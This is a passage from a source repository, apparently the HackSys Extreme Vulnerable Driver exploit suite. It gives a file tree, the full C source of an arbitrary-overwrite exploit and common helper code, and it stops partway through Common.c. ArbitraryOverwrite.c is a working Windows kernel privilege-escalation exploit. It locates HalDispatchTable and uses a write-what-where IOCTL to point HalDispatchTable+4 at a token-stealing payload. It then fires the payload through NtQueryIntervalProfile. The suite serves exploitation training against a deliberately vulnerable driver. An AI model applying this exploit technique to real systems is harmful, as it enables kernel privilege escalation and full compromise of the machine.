├── .gitattributes
├── .gitignore
├── HEVD_Source_with_Unin_Heap_Variable_Chall
├── ArbitraryOverwrite.c
├── ArbitraryOverwrite.h
├── Common.c
├── Common.h
├── Debug
│ ├── ArbitraryOverwrite.obj
│ ├── CL.read.1.tlog
│ ├── CL.write.1.tlog
│ ├── Common.obj
│ ├── HackSysEVDExploit.exe
│ ├── HackSysEVDExploit.exe.intermediate.manifest
│ ├── HackSysEVDExploit.ilk
│ ├── HackSysEVDExploit.lastbuildstate
│ ├── HackSysEVDExploit.log
│ ├── HackSysEVDExploit.obj
│ ├── HackSysEVDExploit.pdb
│ ├── HackSysEVDExploit.vcxprojResolveAssemblyReference.cache
│ ├── HackSysEVDExploit.write.1.tlog
│ ├── IntegerOverflow.obj
│ ├── NullPointerDereference.obj
│ ├── Payloads.obj
│ ├── PoolOverflow.obj
│ ├── StackOverflow.obj
│ ├── StackOverflowGS.obj
│ ├── TypeConfusion.obj
│ ├── UninitializedHeapVariable.obj
│ ├── UninitializedStackVariable.obj
│ ├── UseAfterFree.obj
│ ├── cl.command.1.tlog
│ ├── link.command.1.tlog
│ ├── link.read.1.tlog
│ ├── link.write.1.tlog
│ ├── mt.command.1.tlog
│ ├── mt.read.1.tlog
│ ├── mt.write.1.tlog
│ ├── vc100.idb
│ └── vc100.pdb
├── HackSysEVDExploit.c
├── HackSysEVDExploit.h
├── HackSysEVDExploit.sdf
├── HackSysEVDExploit.sln
├── HackSysEVDExploit.suo
├── HackSysEVDExploit.vcxproj
├── HackSysEVDExploit.vcxproj.filters
├── HackSysEVDExploit.vcxproj.user
├── IntegerOverflow.c
├── IntegerOverflow.h
├── NullPointerDereference.c
├── NullPointerDereference.h
├── Payloads.c
├── Payloads.h
├── PoolOverflow.c
├── PoolOverflow.h
├── Release
│ ├── ArbitraryOverwrite.obj
│ ├── CL.read.1.tlog
│ ├── CL.write.1.tlog
│ ├── Common.obj
│ ├── HackSysEVDExploit.Build.CppClean.log
│ ├── HackSysEVDExploit.exe
│ ├── HackSysEVDExploit.exe.intermediate.manifest
│ ├── HackSysEVDExploit.lastbuildstate
│ ├── HackSysEVDExploit.log
│ ├── HackSysEVDExploit.obj
│ ├── HackSysEVDExploit.pdb
│ ├── HackSysEVDExploit.vcxprojResolveAssemblyReference.cache
│ ├── HackSysEVDExploit.write.1.tlog
│ ├── HackSysEVDExploit1.exe
│ ├── IntegerOverflow.obj
│ ├── NullPointerDereference.obj
│ ├── Payloads.obj
│ ├── PoolOverflow.obj
│ ├── StackOverflow.obj
│ ├── StackOverflowGS.obj
│ ├── TypeConfusion.obj
│ ├── UninitializedHeapVariable.obj
│ ├── UninitializedStackVariable.obj
│ ├── UseAfterFree.obj
│ ├── cl.command.1.tlog
│ ├── link.command.1.tlog
│ ├── link.read.1.tlog
│ ├── link.write.1.tlog
│ ├── mt.command.1.tlog
│ ├── mt.read.1.tlog
│ ├── mt.write.1.tlog
│ └── vc100.pdb
├── StackOverflow.c
├── StackOverflow.h
├── StackOverflowGS.c
├── StackOverflowGS.h
├── TypeConfusion.c
├── TypeConfusion.h
├── UninitializedHeapVariable.c
├── UninitializedHeapVariable.c.bak
├── UninitializedHeapVariable.h
├── UninitializedStackVariable.c
├── UninitializedStackVariable.h
├── UseAfterFree.c
├── UseAfterFree.h
├── arg.h
└── ipch
│ └── hacksysevdexploit-6f66b5a3
│ └── hacksysevdexploit-e885ecc0.ipch
├── HEVD_Win10&Win8
├── README.txt
└── Stop_by_win8
│ ├── Stop_by_win10.sln
│ ├── Stop_by_win10.suo
│ └── Stop_by_win10
│ ├── HEVD_Stop_By_Win10.c
│ ├── HEVD_Stop_By_Win10.h
│ ├── Release
│ ├── CL.read.1.tlog
│ ├── CL.write.1.tlog
│ ├── HEVD_Stop_By_Win10.obj
│ ├── Stop_by_win10.Build.CppClean.log
│ ├── Stop_by_win10.lastbuildstate
│ ├── Stop_by_win10.log
│ ├── Stop_by_win10.unsuccessfulbuild
│ ├── Stop_by_win10.write.1.tlog
│ ├── cl.command.1.tlog
│ ├── link.command.1.tlog
│ ├── link.read.1.tlog
│ ├── link.write.1.tlog
│ └── vc100.pdb
│ ├── Stop_By_Win10.cpp
│ ├── Stop_by_win10.vcxproj
│ ├── Stop_by_win10.vcxproj.filters
│ ├── Stop_by_win10.vcxproj.user
│ ├── _debugbreak.asm
│ ├── _debugbreak.obj
│ └── x64
│ └── Release
│ ├── CL.read.1.tlog
│ ├── CL.write.1.tlog
│ ├── HEVD_Stop_By_Win10.obj
│ ├── Stop_by_win10.Build.CppClean.log
│ ├── Stop_by_win10.exe.intermediate.manifest
│ ├── Stop_by_win10.lastbuildstate
│ ├── Stop_by_win10.log
│ ├── Stop_by_win10.write.1.tlog
│ ├── cl.command.1.tlog
│ ├── custombuild.command.1.tlog
│ ├── custombuild.read.1.tlog
│ ├── custombuild.write.1.tlog
│ ├── link.command.1.tlog
│ ├── link.read.1.tlog
│ ├── link.write.1.tlog
│ ├── mt.command.1.tlog
│ ├── mt.read.1.tlog
│ ├── mt.write.1.tlog
│ └── vc100.pdb
├── _cve_2017_6178_poc
└── _CVE_2017_6178_PoC.cpp
└── memory-leak_output_art_ReadOnePNGImage_output.picon
/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
3 |
4 | # Custom for Visual Studio
5 | *.cs diff=csharp
6 |
7 | # Standard to msysgit
8 | *.doc diff=astextplain
9 | *.DOC diff=astextplain
10 | *.docx diff=astextplain
11 | *.DOCX diff=astextplain
12 | *.dot diff=astextplain
13 | *.DOT diff=astextplain
14 | *.pdf diff=astextplain
15 | *.PDF diff=astextplain
16 | *.rtf diff=astextplain
17 | *.RTF diff=astextplain
18 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | # Windows image file caches
2 | Thumbs.db
3 | ehthumbs.db
4 |
5 | # Folder config file
6 | Desktop.ini
7 |
8 | # Recycle Bin used on file shares
9 | $RECYCLE.BIN/
10 |
11 | # Windows Installer files
12 | *.cab
13 | *.msi
14 | *.msm
15 | *.msp
16 |
17 | # Windows shortcuts
18 | *.lnk
19 |
20 | # =========================
21 | # Operating System Files
22 | # =========================
23 |
24 | # OSX
25 | # =========================
26 |
27 | .DS_Store
28 | .AppleDouble
29 | .LSOverride
30 |
31 | # Thumbnails
32 | ._*
33 |
34 | # Files that might appear in the root of a volume
35 | .DocumentRevisions-V100
36 | .fseventsd
37 | .Spotlight-V100
38 | .TemporaryItems
39 | .Trashes
40 | .VolumeIcon.icns
41 |
42 | # Directories potentially created on remote AFP share
43 | .AppleDB
44 | .AppleDesktop
45 | Network Trash Folder
46 | Temporary Items
47 | .apdisk
48 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/ArbitraryOverwrite.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see <http://www.gnu.org/licenses/>.
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | ArbitraryOverwrite.c
43 |
44 | Abstract:
45 | This module implements the exploit for Arbitrary Memory
46 | Overwrite Vulnerability implemented in HackSys Extreme
47 | Vulnerable Driver.
48 |
49 | --*/
50 |
51 | #include "ArbitraryOverwrite.h"
52 |
/*
 * Thread body for the Arbitrary Memory Overwrite module. Parameter is the
 * thread argument required by the CreateThread signature; it is not read.
 *
 * Sequence, as coded: raise the thread priority, open the device, build a
 * WRITE_WHAT_WHERE on the process heap, send
 * HACKSYS_EVD_IOCTL_ARBITRARY_OVERWRITE, then call NtQueryIntervalProfile.
 *
 * Returns EXIT_SUCCESS when every step completes. Every failure path calls
 * exit(EXIT_FAILURE) instead of returning, so the caller never sees an
 * error code; the __except handler does the same for any SEH exception.
 *
 * NOTE(review): hFile is never passed to CloseHandle and hNtDll is never
 * released. The process exits soon afterwards, so nothing leaks for long,
 * but both would need closing if this ran inside a longer-lived host.
 * NOTE(review): the (ULONG) pointer arithmetic below truncates pointers and
 * is correct only for 32-bit builds; the checked-in build log links
 * /MACHINE:X86.
 */
DWORD WINAPI ArbitraryOverwriteThread(LPVOID Parameter) {
    ULONG Interval = 0;
    ULONG BytesReturned;                  // out-param of DeviceIoControl; never read afterwards
    HANDLE hFile = NULL;
    HMODULE hNtDll = NULL;
    PVOID HalDispatchTable = NULL;
    PVOID HalDispatchTablePlus4 = NULL;
    LPCSTR FileName = (LPCSTR)DEVICE_NAME;
    PWRITE_WHAT_WHERE WriteWhatWhere = NULL;
    PVOID EopPayload = &TokenStealingPayloadWin7Generic;   // address of the payload routine (presumably declared in Payloads.h)

    __try {
        DEBUG_MESSAGE("\t[+] Setting Thread Priority\n");

        // A priority failure is logged but is not fatal.
        if (!SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST)) {
            DEBUG_ERROR("\t\t[-] Failed To Set As THREAD_PRIORITY_HIGHEST\n");
        }
        else {
            DEBUG_INFO("\t\t[+] Priority Set To THREAD_PRIORITY_HIGHEST\n");
        }

        // Get the device handle; GetDeviceHandle hands back CreateFile's
        // result, so INVALID_HANDLE_VALUE (not NULL) signals failure.
        DEBUG_MESSAGE("\t[+] Getting Device Driver Handle\n");
        DEBUG_INFO("\t\t[+] Device Name: %s\n", FileName);

        hFile = GetDeviceHandle(FileName);

        if (hFile == INVALID_HANDLE_VALUE) {
            DEBUG_ERROR("\t\t[-] Failed Getting Device Handle: 0x%X\n", GetLastError());
            exit(EXIT_FAILURE);
        }
        else {
            // %X on a HANDLE only matches the type on x86; %p would be portable.
            DEBUG_INFO("\t\t[+] Device Handle: 0x%X\n", hFile);
        }

        DEBUG_MESSAGE("\t[+] Setting Up Vulnerability Stage\n");

        DEBUG_INFO("\t\t[+] Allocating Memory For WRITE_WHAT_WHERE Structure\n");

        // Allocate the heap chunk that is passed as the IOCTL input buffer.
        WriteWhatWhere = (PWRITE_WHAT_WHERE)HeapAlloc(GetProcessHeap(),
                                                      HEAP_ZERO_MEMORY,
                                                      sizeof(WRITE_WHAT_WHERE));

        if (!WriteWhatWhere) {
            DEBUG_ERROR("\t\t[-] Failed To Allocate Memory: 0x%X\n", GetLastError());
            exit(EXIT_FAILURE);
        }
        else {
            DEBUG_INFO("\t\t\t[+] Memory Allocated: 0x%p\n", WriteWhatWhere);
            DEBUG_INFO("\t\t\t[+] Allocation Size: 0x%X\n", sizeof(WRITE_WHAT_WHERE));
        }

        DEBUG_INFO("\t\t[+] Gathering Information About Kernel\n");

        // GetHalDispatchTable (Common.c) exits on failure itself; the NULL
        // check below is a second line of defence.
        HalDispatchTable = GetHalDispatchTable();

        if (!HalDispatchTable) {
            DEBUG_ERROR("\t\t[-] Failed Gathering Information: 0x%X\n", GetLastError());
            exit(EXIT_FAILURE);
        }
        else {
            // The log text hard-codes "+0x4", which matches sizeof(PVOID) on x86 only.
            HalDispatchTablePlus4 = (PVOID)((ULONG)HalDispatchTable + sizeof(PVOID));

            DEBUG_INFO("\t\t\t[+] HalDispatchTable+0x4: 0x%p\n", HalDispatchTablePlus4);
        }

        DEBUG_INFO("\t\t[+] Preparing WRITE_WHAT_WHERE structure\n");

        // What points at the local that holds the payload address; Where is
        // the kernel address computed above. Field meaning is defined by the
        // driver side, which is not part of this listing.
        WriteWhatWhere->What = (PULONG)&EopPayload;
        WriteWhatWhere->Where = (PULONG)HalDispatchTablePlus4;

        DEBUG_INFO("\t\t\t[+] WriteWhatWhere: 0x%p\n", WriteWhatWhere);
        DEBUG_INFO("\t\t\t[+] WriteWhatWhere->What: 0x%p\n", WriteWhatWhere->What);
        DEBUG_INFO("\t\t\t[+] WriteWhatWhere->Where: 0x%p\n", WriteWhatWhere->Where);

        DEBUG_INFO("\t\t[+] EoP Payload: 0x%p\n", EopPayload);

        DEBUG_MESSAGE("\t[+] Triggering Arbitrary Memory Overwrite\n");

        // Marker lines bracket the kernel-side work in the debugger output.
        OutputDebugString("****************Kernel Mode****************\n");

        // NOTE(review): the BOOL result is discarded, so a rejected or failed
        // IOCTL is not detected here and the code proceeds regardless.
        DeviceIoControl(hFile,
                        HACKSYS_EVD_IOCTL_ARBITRARY_OVERWRITE,
                        (LPVOID)WriteWhatWhere,
                        sizeof(WRITE_WHAT_WHERE),
                        NULL,
                        0,
                        &BytesReturned,
                        NULL);

        OutputDebugString("****************Kernel Mode****************\n");

        DEBUG_INFO("\t\t[+] Triggering Payload\n");

        // NtQueryIntervalProfile is not exported by the public headers, so it
        // is resolved from ntdll at run time into the file-scope function pointer.
        hNtDll = LoadLibrary("ntdll.dll");

        if (!hNtDll) {
            DEBUG_ERROR("\t\t[-] Failed loading NtDll: 0x%X\n", GetLastError());
            exit(EXIT_FAILURE);
        }

        NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(hNtDll, "NtQueryIntervalProfile");

        if (!NtQueryIntervalProfile) {
            DEBUG_ERROR("\t\t[-] Failed Resolving NtQueryIntervalProfile: 0x%X\n", GetLastError());
            exit(EXIT_FAILURE);
        }

        // Per the log line above this call is what fires the payload; its
        // NTSTATUS and the Interval it writes are both ignored.
        NtQueryIntervalProfile(0x1337, &Interval);

        HeapFree(GetProcessHeap(), 0, (LPVOID)WriteWhatWhere);

        WriteWhatWhere = NULL;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        // GetLastError() is not the exception code; GetExceptionCode() would
        // be the value a reader of this log actually wants.
        DEBUG_ERROR("\t\t[-] Exception: 0x%X\n", GetLastError());
        exit(EXIT_FAILURE);
    }

    return EXIT_SUCCESS;
}
175 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/ArbitraryOverwrite.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see <http://www.gnu.org/licenses/>.
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | ArbitraryOverwrite.h
43 |
44 | Abstract:
45 | This module implements the data structures used by the
46 | exploit for Arbitrary Memory Overwrite Vulnerability
47 | implemented in HackSys Extreme Vulnerable Driver.
48 |
49 | --*/
50 |
51 | #ifndef __ARBITRARY_OVERWRITE_H__
52 | #define __ARBITRARY_OVERWRITE_H__
53 |
54 | #pragma once
55 |
56 | #include "Common.h"
57 |
/*
 * Input buffer for HACKSYS_EVD_IOCTL_ARBITRARY_OVERWRITE (filled in by
 * ArbitraryOverwriteThread in ArbitraryOverwrite.c). The layout must match
 * what the driver expects; the driver source is not part of this listing.
 */
typedef struct _WRITE_WHAT_WHERE {
    PULONG What;    // address of the value to copy — presumably read by the driver; confirm against the driver source
    PULONG Where;   // address the driver writes to — confirm against the driver source
} WRITE_WHAT_WHERE, *PWRITE_WHAT_WHERE;
62 |
63 | DWORD WINAPI ArbitraryOverwriteThread(LPVOID Parameter);
64 |
65 | #endif //__ARBITRARY_OVERWRITE_H__
66 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Common.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see <http://www.gnu.org/licenses/>.
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | Common.c
43 |
44 | Abstract:
45 | This module implements the methods which are
46 | common to all the exploit modules.
47 |
48 | --*/
49 |
50 | #include "Common.h"
51 |
/*
 * Clears the console attached to STD_OUTPUT_HANDLE: blanks every cell,
 * re-applies the current text attributes to the whole buffer and homes the
 * cursor. Returns silently as soon as any console query or fill fails
 * (for example when stdout is redirected and is not a console).
 *
 * Based on the MSDN "Clearing the Screen" sample:
 * https://msdn.microsoft.com/en-us/library/windows/desktop/ms682022(v=vs.85).aspx
 */
VOID ClearScreen()
{
    HANDLE hOut = GetStdHandle(STD_OUTPUT_HANDLE);
    CONSOLE_SCREEN_BUFFER_INFO Info;
    COORD Origin = {0, 0};
    DWORD CellCount;
    DWORD Written;

    if (!GetConsoleScreenBufferInfo(hOut, &Info)) {
        return;
    }

    // Total number of character cells in the screen buffer.
    CellCount = Info.dwSize.X * Info.dwSize.Y;

    // Each step only runs if the previous one succeeded; && keeps the
    // original ordering (fill chars, re-query, fill attributes, home cursor).
    if (FillConsoleOutputCharacter(hOut, (TCHAR)' ', CellCount, Origin, &Written)
        && GetConsoleScreenBufferInfo(hOut, &Info)
        && FillConsoleOutputAttribute(hOut, Info.wAttributes, CellCount, Origin, &Written)) {
        SetConsoleCursorPosition(hOut, Origin);
    }
}
94 |
95 |
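/*
 * printf-style logger used by the DEBUG_* macros: writes the formatted text
 * to stderr in the given console colour and mirrors it to the debugger via
 * OutputDebugString.
 *
 * wColor: console attribute bits (FOREGROUND_* flags); FOREGROUND_INTENSITY
 *         is always added.
 * fmt:    printf format string followed by its arguments. The format string
 *         comes from the program's own call sites, never from outside input.
 *
 * Fixes versus the previous version:
 *  - the same va_list was consumed three times (_vscprintf, vfprintf,
 *    vsprintf_s) without being restarted, which is undefined behaviour; each
 *    consumer now gets a fresh va_start/va_end pair (va_copy is not
 *    available in the VS2010 toolchain this project is built with);
 *  - a failed HeapAlloc was passed straight to vsprintf_s; the debugger copy
 *    is now skipped when the buffer could not be allocated;
 *  - a failed GetConsoleScreenBufferInfo left CurrentAttributes
 *    uninitialised and then "restored" it; colour changes are now only made
 *    when the current attributes were actually read.
 */
VOID ColoredConsoleOuput(WORD wColor, CONST PTCHAR fmt, ...) {
    int Needed;
    SIZE_T Length = 0;
    PTCHAR DebugString = NULL;
    va_list args;
    HANDLE hConsoleOutput;
    BOOL HaveAttributes;
    WORD CurrentAttributes = 0;
    CONSOLE_SCREEN_BUFFER_INFO ConsoleScreenBufferInfo;

    // Pass 1: measure. _vscprintf returns -1 on a bad format.
    va_start(args, fmt);
    Needed = _vscprintf(fmt, args);
    va_end(args);

    if (Needed < 0) {
        return;
    }

    // +2 keeps the original slack for the terminator.
    Length = (SIZE_T)Needed + 2;
    DebugString = (PTCHAR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, Length * sizeof(TCHAR));

    hConsoleOutput = GetStdHandle(STD_OUTPUT_HANDLE);
    HaveAttributes = GetConsoleScreenBufferInfo(hConsoleOutput, &ConsoleScreenBufferInfo);

    if (HaveAttributes) {
        CurrentAttributes = ConsoleScreenBufferInfo.wAttributes;
        SetConsoleTextAttribute(hConsoleOutput, FOREGROUND_INTENSITY | wColor);
    }

    // Pass 2: console output.
    va_start(args, fmt);
    vfprintf(stderr, fmt, args);
    va_end(args);

    // Pass 3: debugger copy, only if the buffer exists.
    if (DebugString) {
        va_start(args, fmt);
        vsprintf_s(DebugString, Length, fmt, args);
        va_end(args);

        OutputDebugString(DebugString);
        HeapFree(GetProcessHeap(), 0, (LPVOID)DebugString);
    }

    if (HaveAttributes) {
        SetConsoleTextAttribute(hConsoleOutput, CurrentAttributes);
    }
}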
120 |
/*
 * Moves the console window to roughly the centre of the primary display and
 * resizes it to 700x600. The offsets (680, 350 and the extra -150) are the
 * author's tuning constants and are kept unchanged.
 */
VOID CenterConsoleScreen() {
    const int Width = 700;
    const int Height = 600;
    int ScreenW = GetSystemMetrics(SM_CXSCREEN);
    int ScreenH = GetSystemMetrics(SM_CYSCREEN);
    int Left = (ScreenW - 680) / 2;
    int Top = ((ScreenH - 350) / 2) - 150;

    MoveWindow(GetConsoleWindow(), Left, Top, Width, Height, TRUE);
}
127 |
/*
 * Opens the named device for read/write access with OPEN_EXISTING.
 *
 * FileName: device path; callers pass DEVICE_NAME.
 * Returns:  CreateFile's result, i.e. INVALID_HANDLE_VALUE on failure.
 *           Nothing is logged here; callers test the handle and consult
 *           GetLastError() themselves.
 *
 * NOTE(review): the handle is opened with FILE_FLAG_OVERLAPPED while the
 * callers in this project issue DeviceIoControl with a NULL OVERLAPPED.
 * The flag is kept as-is so behaviour is unchanged, but it is worth
 * confirming the intent.
 */
HANDLE GetDeviceHandle(LPCSTR FileName) {
    const DWORD Access = GENERIC_READ | GENERIC_WRITE;
    const DWORD Share = FILE_SHARE_READ | FILE_SHARE_WRITE;
    const DWORD Flags = FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED;

    return CreateFile(FileName, Access, Share, NULL, OPEN_EXISTING, Flags, NULL);
}
141 |
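/*
 * Returns the PID of the first running process whose executable name equals
 * ProcessName (exact, case-sensitive strcmp against szExeFile).
 *
 * ProcessName: executable file name to look for, e.g. "cmd.exe".
 * Returns:     the matching th32ProcessID, or 0 when no process matches or
 *              ProcessName is NULL. Snapshot failures are fatal: the error
 *              is logged and exit(EXIT_FAILURE) is called, matching the
 *              other helpers in this file.
 *
 * Fix: CreateToolhelp32Snapshot signals failure with INVALID_HANDLE_VALUE,
 * not NULL, so the old `if (!hProcessSnapshot)` check never fired and a
 * failed snapshot was passed on to Process32First. The snapshot handle is
 * now also closed on the Process32First failure path.
 */
DWORD GetProcessID(LPCSTR ProcessName) {
    ULONG ProcessID = 0;
    HANDLE hProcessSnapshot = INVALID_HANDLE_VALUE;
    PROCESSENTRY32 ProcessEntry32 = {0};
    ProcessEntry32.dwSize = sizeof(PROCESSENTRY32);

    // strcmp on a NULL name would fault; treat it as "no match".
    if (!ProcessName) {
        return 0;
    }

    // Create the snapshot of all processes
    hProcessSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

    if (hProcessSnapshot == INVALID_HANDLE_VALUE) {
        DEBUG_ERROR("\t\t[-] Failed Creating Snapshot Of Processes: 0x%X\n", GetLastError());
        exit(EXIT_FAILURE);
    }

    if (!Process32First(hProcessSnapshot, &ProcessEntry32)) {
        DEBUG_ERROR("\t\t[-] Failed To Get Info About First Process: 0x%X\n", GetLastError());
        CloseHandle(hProcessSnapshot);
        exit(EXIT_FAILURE);
    }

    // Walk the snapshot until the first name match; later processes with
    // the same name are ignored.
    do {
        if (strcmp(ProcessName, ProcessEntry32.szExeFile) == 0) {
            ProcessID = ProcessEntry32.th32ProcessID;
            break;
        }
    } while (Process32Next(hProcessSnapshot, &ProcessEntry32));

    CloseHandle(hProcessSnapshot);

    return ProcessID;
}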
172 |
/*
 * Returns the kernel-mode address of the HalDispatchTable export, or exits
 * the process on any failure (every error path calls exit(EXIT_FAILURE)).
 *
 * Method, as coded: query SystemModuleInformation through
 * NtQuerySystemInformation, treat Module[0] as the kernel (its Base and
 * ImageName), load that same image file in user mode with LoadLibraryA,
 * resolve "HalDispatchTable" with GetProcAddress, and rebase the result
 * from the user-mode load address onto the kernel base.
 *
 * NOTE(review): the first NtQuerySystemInformation call is a size probe and
 * is expected to return STATUS_INFO_LENGTH_MISMATCH while filling
 * ReturnLength. Its status is ignored, and ReturnLength is only ever written
 * by that call, so if it fails for another reason HeapAlloc is handed an
 * uninitialised size.
 * NOTE(review): strrchr(...) + 1 assumes ImageName contains a backslash;
 * with none, KernelImage becomes (PCHAR)1 and LoadLibraryA will fault.
 * NOTE(review): the (ULONG) casts truncate pointers; 32-bit builds only.
 */
PVOID GetHalDispatchTable() {
    PCHAR KernelImage;
    SIZE_T ReturnLength;
    HMODULE hNtDll = NULL;
    PVOID HalDispatchTable = NULL;
    HMODULE hKernelInUserMode = NULL;
    PVOID KernelBaseAddressInKernelMode;
    NTSTATUS NtStatus = STATUS_UNSUCCESSFUL;
    PSYSTEM_MODULE_INFORMATION pSystemModuleInformation;

    // NtQuerySystemInformation is resolved at run time into the file-scope
    // function pointer of the same name.
    hNtDll = LoadLibrary("ntdll.dll");

    if (!hNtDll) {
        DEBUG_ERROR("\t\t\t[-] Failed To Load NtDll.dll: 0x%X\n", GetLastError());
        exit(EXIT_FAILURE);
    }

    NtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(hNtDll, "NtQuerySystemInformation");

    if (!NtQuerySystemInformation) {
        DEBUG_ERROR("\t\t\t[-] Failed Resolving NtQuerySystemInformation: 0x%X\n", GetLastError());
